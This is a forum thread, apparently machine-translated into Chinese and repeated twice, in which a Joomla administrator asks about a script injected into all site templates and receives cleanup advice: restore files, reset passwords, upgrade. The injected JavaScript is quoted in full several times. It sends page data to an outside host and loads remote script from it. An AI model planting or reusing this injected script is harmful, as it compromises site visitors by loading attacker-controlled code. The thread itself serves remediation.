脚本注入 Joomla 模板
Script injection Joomla Templates
我管理着很多 Joomla 网站,几个月前,在所有这些网站中,开始出现一些非常奇怪的脚本...
像上面这个:
所以我手动删除了所有内容,但它们再次出现:(
有人可以帮助理解发生了什么吗?我应该编辑一些文件以防止发生这种情况吗?
非常感谢!
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
如果脚本出现在您的模板中,我认为您被黑了。尝试将所有文件内容恢复到第一次发生之前的时间,并重置所有密码。然后升级到最新的joomla版本以防止黑客入侵。
如果您不确定攻击发生的时间,因此无法回滚到以前的版本,请将所有代码替换为新下载的代码(Joomla 核心、下载的组件等)。查看图像文件夹以检查它是否只包含图像(没有 php 脚本或其他看起来可疑的文件)。如果您有自定义代码,请查看此代码以检查其中没有注入任何内容。并再次重置所有密码(ftp、用户密码、db-passwords 等)。那你就没事了。
所以,有点复杂!但是我发现我的服务器被黑了
我拥有的服务器结构:
joomlasite (folder 1)
otherjoomlasite (folder2)
bigjoomlasite (folder3)
(...)
php.ini
所以在 public_html 文件夹中我发现了很多非常奇怪的文件,比如!!!
public_html
joomlasite
joomlasite.com (hacked issue - so i deleted this folder)
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
otherjoomlasite
otherjoomlasite.org
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
bigjoomlasite (folder3)
bigjoomlasite.io
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
alias.php (strange file)
article.php (strange file)
css.php (strange file)
所以我删除了所有奇怪的文件,joomla文件夹还好,我还没有找到奇怪的文件!
是否更改了所有安全措施、密码等...
并且在所有 joomla 模板中删除了:
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
看起来现在一切都稳定了:)
感谢您的回答和建议...
我管理着很多 Joomla 网站,几个月前,在所有这些网站中,开始出现一些非常奇怪的脚本...
像上面这个:
所以我手动删除了所有内容,但它们再次出现:(
有人可以帮助理解发生了什么吗?我应该编辑一些文件以防止发生这种情况吗?
非常感谢!
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
如果脚本出现在您的模板中,我认为您被黑了。尝试将所有文件内容恢复到第一次发生之前的时间,并重置所有密码。然后升级到最新的joomla版本以防止黑客入侵。
如果您不确定攻击发生的时间,因此无法回滚到以前的版本,请将所有代码替换为新下载的代码(Joomla 核心、下载的组件等)。查看图像文件夹以检查它是否只包含图像(没有 php 脚本或其他看起来可疑的文件)。如果您有自定义代码,请查看此代码以检查其中没有注入任何内容。并再次重置所有密码(ftp、用户密码、db-passwords 等)。那你就没事了。
所以,有点复杂!但是我发现我的服务器被黑了
我拥有的服务器结构:
joomlasite (folder 1)
otherjoomlasite (folder2)
bigjoomlasite (folder3)
(...)
php.ini
所以在 public_html 文件夹中我发现了很多非常奇怪的文件,比如!!!
public_html
joomlasite
joomlasite.com (hacked issue - so i deleted this folder)
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
otherjoomlasite
otherjoomlasite.org
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
bigjoomlasite (folder3)
bigjoomlasite.io
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
alias.php (strange file)
article.php (strange file)
css.php (strange file)
所以我删除了所有奇怪的文件,joomla文件夹还好,我还没有找到奇怪的文件!
是否更改了所有安全措施、密码等...
并且在所有 joomla 模板中删除了:
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
看起来现在一切都稳定了:)
感谢您的回答和建议...